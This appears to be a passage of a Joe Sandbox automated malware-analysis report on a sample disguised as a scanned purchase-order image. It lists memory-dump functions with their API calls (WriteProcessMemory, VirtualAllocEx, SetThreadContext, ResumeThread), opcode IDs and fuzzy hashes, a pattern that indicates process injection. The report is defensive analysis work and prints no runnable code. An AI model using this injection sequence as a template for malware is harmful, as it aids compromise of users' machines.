                                                                                                        • Instruction Fuzzy Hash: EC41D4B0C00619CFDB24DFA9C844BDEBBF5BF45304F24805AD408AB265DB756986CF90
                                                                                                        Function 0C1C7374 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 820 c1c7374-c1c73c6 823 c1c73c8-c1c73d4 820->823 824 c1c73d6-c1c7415 WriteProcessMemory 820->824 823->824 826 c1c741e-c1c744e 824->826 827 c1c7417-c1c741d 824->827 827->826
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0C1C7408
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 6a3adc477156a4129002e6f07847d11f1f1a6c678541a88632027315778bf27c
                                                                                                        • Instruction ID: fabcb109cbcd1ac0be4c82044d9928553545c04b23b45c3cbbfcddd00d9d0357
                                                                                                        • Opcode Fuzzy Hash: 6a3adc477156a4129002e6f07847d11f1f1a6c678541a88632027315778bf27c
                                                                                                        • Instruction Fuzzy Hash: 322137B1A003599FCB10DFA9C985BDEBBF5FF48310F10842AE958A7251D7B89544CFA4
                                                                                                        Function 0C1C7378 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 831 c1c7378-c1c73c6 833 c1c73c8-c1c73d4 831->833 834 c1c73d6-c1c7415 WriteProcessMemory 831->834 833->834 836 c1c741e-c1c744e 834->836 837 c1c7417-c1c741d 834->837 837->836
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0C1C7408
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 3b3b3390c28d104e59801e99f6dc42ea1cf28e9a0c265368fa702351bed0ccdd
                                                                                                        • Instruction ID: 71c3428dc3bcff531db1f770d57324afb2ce861c1988d85d364255919cc70dc1
                                                                                                        • Opcode Fuzzy Hash: 3b3b3390c28d104e59801e99f6dc42ea1cf28e9a0c265368fa702351bed0ccdd
                                                                                                        • Instruction Fuzzy Hash: 7F2125B1A003599FCB10DFA9C985BDEBBF5FF48310F10842AE958A7250D7B89944CFA4
                                                                                                        Function 0C1C7460 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0C1C74E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: cd279c5455a83397a1b7588c851d87ca9586d6f6b4d2427d8979151260f44221
                                                                                                        • Instruction ID: de2593c4c96a06a32f5b3a50661ebc2221f5d6ce925c547288b8ebb822c4e280
                                                                                                        • Opcode Fuzzy Hash: cd279c5455a83397a1b7588c851d87ca9586d6f6b4d2427d8979151260f44221
                                                                                                        • Instruction Fuzzy Hash: DB214AB19002599FCB10DFA9C885AEEFBF5FF88310F10842AE558A7250C7789540CFA4
                                                                                                        Function 0C1C71D9 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0C1C725E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 93c68e0284c47eb1f3696f1de5591350d8d154192cfa67d8ebb694bc73346840
                                                                                                        • Instruction ID: 4a82369e8ab8d2e02b565683a6d1c534a460465ce2c5f65c167a564d99e5b15c
                                                                                                        • Opcode Fuzzy Hash: 93c68e0284c47eb1f3696f1de5591350d8d154192cfa67d8ebb694bc73346840
                                                                                                        • Instruction Fuzzy Hash: 65214CB19002098FDB10DFA9C5857EEFBF4EF98314F14842EE559A7240CB789945CF94
                                                                                                        Function 0C1C7468 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0C1C74E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: 62bbc14ed007ee4a24fea7f8381334dcdc5c6a66dc5fbec3348121420c993351
                                                                                                        • Instruction ID: e5ff721fe628791aa25271707fce3d786fdae21fcb18744e66ad6d3d032586e9
                                                                                                        • Opcode Fuzzy Hash: 62bbc14ed007ee4a24fea7f8381334dcdc5c6a66dc5fbec3348121420c993351
                                                                                                        • Instruction Fuzzy Hash: AE2128B19002599FCB10DFAAC985AEEFBF5FF48320F10842AE558A7250C7789544CFA4
                                                                                                        Function 0C1C71E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0C1C725E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: f0e06ee7cf0148bcffdc38b3cdaf55f59395e2a0d95d757abb27620f6dac47e4
                                                                                                        • Instruction ID: 8382da7e84bb3b2cd885dd470d2d71d4646b6bf01919b43be7e6ec63c5452723
                                                                                                        • Opcode Fuzzy Hash: f0e06ee7cf0148bcffdc38b3cdaf55f59395e2a0d95d757abb27620f6dac47e4
                                                                                                        • Instruction Fuzzy Hash: F12118B19002098FDB10DFAAC5857EEFBF4EF88324F14842EE559A7240CB789945CFA5
                                                                                                        Function 0C1C72B1 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0C1C7326
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 011a0888c833e333df7dfc5e74c32f3ad021b8845d6ec2f7f8accfb81140df62
                                                                                                        • Instruction ID: bf341450cf722e727f85e8f72183fc6d8d3aa9bc2697e8910634cac290954293
                                                                                                        • Opcode Fuzzy Hash: 011a0888c833e333df7dfc5e74c32f3ad021b8845d6ec2f7f8accfb81140df62
                                                                                                        • Instruction Fuzzy Hash: 98215C71900249DFCB20DFAAC844ADEBFF5EF88314F108419E555A7250C7759544CFA4
                                                                                                        Function 0C1C7129 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 42dc0850488307e852712958832395bf45abc4e6adead55e6d371792b6ec044c
                                                                                                        • Instruction ID: 64c11bf1e1e817f76938fc2355bd52d9cabaa9ee8232bf952a5cb2d18487fb79
                                                                                                        • Opcode Fuzzy Hash: 42dc0850488307e852712958832395bf45abc4e6adead55e6d371792b6ec044c
                                                                                                        • Instruction Fuzzy Hash: 2A1146B1D002488FDB20DFAAC4857EEFBF5EF89324F20842AD559A7250C778A945CF94
                                                                                                        Function 0C1C72B8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0C1C7326
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 79dee94faf882faa1cf975745591f80e82271cd615b7961ec4b1be26cb58c2bd
                                                                                                        • Instruction ID: a00f929e7c99d80732a2a25086bc81cb7db07fdab4a49191d3c3d5eace1450d4
                                                                                                        • Opcode Fuzzy Hash: 79dee94faf882faa1cf975745591f80e82271cd615b7961ec4b1be26cb58c2bd
                                                                                                        • Instruction Fuzzy Hash: 591137B19002499FCB20DFAAC845BDEBFF5EF88320F208419E959A7250C779A544CFA4
                                                                                                        Function 0C1C7130 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: caa5929aea359fc20a16ae01a5a4319c8a29b776c2fa46183e726005c4575c4e
                                                                                                        • Instruction ID: e910b9469ced21efac57eeddf323ef7230f8d822d16878a4fe0423e4b92c6e6d
                                                                                                        • Opcode Fuzzy Hash: caa5929aea359fc20a16ae01a5a4319c8a29b776c2fa46183e726005c4575c4e
                                                                                                        • Instruction Fuzzy Hash: B2113AB19002488FDB20DFAAC4457DEFBF5EF89324F208419D559A7250C779A544CF94
                                                                                                        Function 0C1C5E18 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0C1CB80D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        • Opcode ID: 8c205808ce0de8aa1fadea7cb16b4b20325582fcbed3c874d6823094365d7510
                                                                                                        • Instruction ID: 618466aa11253d9899b4c4629cbe40d26c65c05f87fa0fb92433e2937dd003f9
                                                                                                        • Opcode Fuzzy Hash: 8c205808ce0de8aa1fadea7cb16b4b20325582fcbed3c874d6823094365d7510
                                                                                                        • Instruction Fuzzy Hash: 741136B5900348DFCB10DF99C585BDEBBF8EB48320F10841AE914B7200C378A944CFA5
                                                                                                        Function 0141E218 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0141E27E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1731693603.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1410000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: a5b1323c4f5f738ce4eb5ebf33d4a2dbeec76f0a295963b9b45fee852103bec9
                                                                                                        • Instruction ID: 79277b7f2897e4948b7fc46a7569e0b9405740c1d1d196c276ba967e3e9934ba
                                                                                                        • Opcode Fuzzy Hash: a5b1323c4f5f738ce4eb5ebf33d4a2dbeec76f0a295963b9b45fee852103bec9
                                                                                                        • Instruction Fuzzy Hash: 6711DFB5C002498FDB20DF9AD444ADEFBF4EB88324F10842AD959B7210C379A545CFA5
                                                                                                        Function 0C1CB7A9 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0C1CB80D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        • Opcode ID: 4749a9509b0acb06c6a8a1bd0c756faf456ec1489255dfe6f4ed9f9cc73e4099
                                                                                                        • Instruction ID: 8480d18908e64eec3ad78a3cc6a74e33515c45e17f114d95f1018ee4a98b2011
                                                                                                        • Opcode Fuzzy Hash: 4749a9509b0acb06c6a8a1bd0c756faf456ec1489255dfe6f4ed9f9cc73e4099
                                                                                                        • Instruction Fuzzy Hash: DB11F2B59002499FCB20DF99D585BDEBBF8EB48320F10841AE958A7210C379A984CFA1
                                                                                                        Function 05738CAC Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (bq
                                                                                                        • API String ID: 0-149360118
                                                                                                        • Opcode ID: 6dc113ac20e996f9959e10d73420a1c9a14c132c40e12c198aecdf98242ed3c5
                                                                                                        • Instruction ID: 5e50b08e230a5a722d7b4a7290123055d6273d9393d79799021f6120d038577e
                                                                                                        • Opcode Fuzzy Hash: 6dc113ac20e996f9959e10d73420a1c9a14c132c40e12c198aecdf98242ed3c5
                                                                                                        • Instruction Fuzzy Hash: 11910370A05209DFCB14DFA9D849AAEBFF6FF89320F10846EE446A7741DB309805CB91
                                                                                                        Function 0573F650 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @
                                                                                                        • API String ID: 0-2766056989
                                                                                                        • Opcode ID: ff2f6f69f466e702ab8107295f0187757c2f0e7143b7d9c52877b4b67c68fdd9
                                                                                                        • Instruction ID: d2893233eb5d3d4bb0b4fec761c53902a276f23c6e1ba1a8162fb203cbbca4f5
                                                                                                        • Opcode Fuzzy Hash: ff2f6f69f466e702ab8107295f0187757c2f0e7143b7d9c52877b4b67c68fdd9
                                                                                                        • Instruction Fuzzy Hash: 89D10C35D0120ACFCF14DFA8C4949EDB7B1FF48324B218655D8067725AEB34AA8ACF80
                                                                                                        Function 0573F640 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: ce14fbadeda5543f7fa0859ea24fd7d0ff832dbbd20f16e752864caffebebe70
                                                                                                        • Instruction ID: 71f5bdc3b5ae49d2e532c873ffde3678546259cb20e2d5bf10e31ab3cb506681
                                                                                                        • Opcode Fuzzy Hash: ce14fbadeda5543f7fa0859ea24fd7d0ff832dbbd20f16e752864caffebebe70
                                                                                                        • Instruction Fuzzy Hash: F5A1FD3590020ACFCF04DFA8C4849DDB7B1FF58314B218655D806BB259EB30BA8ACF80
                                                                                                        Function 05738C74 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Hbq
                                                                                                        • API String ID: 0-1245868
                                                                                                        • Opcode ID: af04db2d6021e8ee38a1b8858ebb452ea06e351ca07d9c3ad62ba6225ce9e131
                                                                                                        • Instruction ID: c5a763e29c772c2a7fef7c91637c4c9eb7952e7967c85773814f43e370356e1f
                                                                                                        • Opcode Fuzzy Hash: af04db2d6021e8ee38a1b8858ebb452ea06e351ca07d9c3ad62ba6225ce9e131
                                                                                                        • Instruction Fuzzy Hash: 104181B1A00308DFCB14DFA9C485AAEBBF5FF88310F108469E449E7751DB34A945CBA1
                                                                                                        Function 0573C9A8 Relevance: .6, Instructions: 551COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7e0b2749eb936621349af2b19b7f5adc85c1622ea50ee08ec1716c228f406201
                                                                                                        • Instruction ID: 519720edeaf6a498f866911c7028b6c0adcf177de45417e09847cf838b1b5a9b
                                                                                                        • Opcode Fuzzy Hash: 7e0b2749eb936621349af2b19b7f5adc85c1622ea50ee08ec1716c228f406201
                                                                                                        • Instruction Fuzzy Hash: 0342D931E106198FCB25DF68C885AEDB7B5FF89310F118699D459BB261EB30AE85CF40
                                                                                                        Function 0573C998 Relevance: .3, Instructions: 344COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: eaf3fa9c363dbedddf36376f3c089db9f7814e6ff2a55d974471e57cf402c6bf
                                                                                                        • Instruction ID: fa3404f4d9793e735158ff54583085463bd857b166ef370354df553d755c7b8b
                                                                                                        • Opcode Fuzzy Hash: eaf3fa9c363dbedddf36376f3c089db9f7814e6ff2a55d974471e57cf402c6bf
                                                                                                        • Instruction Fuzzy Hash: 6EF12C31E106198FCB25DF68C885AEDB7B6FF49310F1186A9D419BB252EB30AD81CF40
                                                                                                        Function 0573F371 Relevance: .2, Instructions: 201COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9c48ca512b8fdfba286b8d6e80ceefb0a5f056da0c9d18f65c145b4993d60608
                                                                                                        • Instruction ID: 66c18c8ba30333e2f67943d581f14e6af4cba67a2397052e45e910598c81a1c8
                                                                                                        • Opcode Fuzzy Hash: 9c48ca512b8fdfba286b8d6e80ceefb0a5f056da0c9d18f65c145b4993d60608
                                                                                                        • Instruction Fuzzy Hash: E191FB7591060ADFCB01DF68C880999FBF5FF59320B14879AE819EB256E770E985CF80
                                                                                                        Function 0573E707 Relevance: .2, Instructions: 174COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 64c756ab8dd035e00679c58d34a5a871fff24160d7605369f3afaea79d718a41
                                                                                                        • Instruction ID: 5e0aa2cf02b211b7a63c356be78a4aa67f948e764357828f58f22ae4074c8270
                                                                                                        • Opcode Fuzzy Hash: 64c756ab8dd035e00679c58d34a5a871fff24160d7605369f3afaea79d718a41
                                                                                                        • Instruction Fuzzy Hash: 8871BBB9700A00CFC718DF29C588A59BBF2BF8931471589A9E54ACB772DB72EC45CB50
                                                                                                        Function 0573E518 Relevance: .2, Instructions: 172COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7941d61f46899234ed27f6c07e9be0eaf297fd57a5780f9f8b1d6162dedf6b72
                                                                                                        • Instruction ID: ccc28cf4df6d8def9a6ec2252d3c4afc7bd025b84f9c05861458d6be1ee15c6d
                                                                                                        • Opcode Fuzzy Hash: 7941d61f46899234ed27f6c07e9be0eaf297fd57a5780f9f8b1d6162dedf6b72
                                                                                                        • Instruction Fuzzy Hash: 3B7190B4A012068FCB44CF69D584999FBF5FF48314B0986A9E80ADB352E734EC85CF90
                                                                                                        Function 05732DF4 Relevance: .1, Instructions: 105COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4c05a1a6fc68b8dba476bc0d19c38a8d411bc6bc15a8004311956d1c5eb2654d
                                                                                                        • Instruction ID: fa0ed2340d26c5c26a3a0c2be84500bd6dc4af43fe202617c72990e1f1b1cf03
                                                                                                        • Opcode Fuzzy Hash: 4c05a1a6fc68b8dba476bc0d19c38a8d411bc6bc15a8004311956d1c5eb2654d
                                                                                                        • Instruction Fuzzy Hash: 39413E34A10709CFCB14EF68C998DADFBB6FF85304F008569E515AB325EB71A945CB81
                                                                                                        Function 0573D632 Relevance: .1, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: abb15119856e0e0046bf9e7ff20a68f0054314eacbed473c75261bce860599b0
                                                                                                        • Instruction ID: f7e3589e1fe2db5bf635c157d234ee88aba8972d6785527a4296cc0835af854d
                                                                                                        • Opcode Fuzzy Hash: abb15119856e0e0046bf9e7ff20a68f0054314eacbed473c75261bce860599b0
                                                                                                        • Instruction Fuzzy Hash: BE414F35A1070ACFCB04DFA8C958AEDBBB6FF85304F008559E515AB325EB71A946CB81
                                                                                                        Function 0573E508 Relevance: .1, Instructions: 96COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5723692ba3ace7008a1f7ae721e250371e05a45a540113e9b92f766c19bd059c
                                                                                                        • Instruction ID: 1e2cd7cb7037b0938f7b94459a947c9f80dc2fd85cc794296cb5baaa02141fde
                                                                                                        • Opcode Fuzzy Hash: 5723692ba3ace7008a1f7ae721e250371e05a45a540113e9b92f766c19bd059c
                                                                                                        • Instruction Fuzzy Hash: A6413D75A04206CFC715CF29C585A99FBF5FF49320B0986A9E80ADB352E730EC85CB90
                                                                                                        Function 0573B2B8 Relevance: .1, Instructions: 95COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
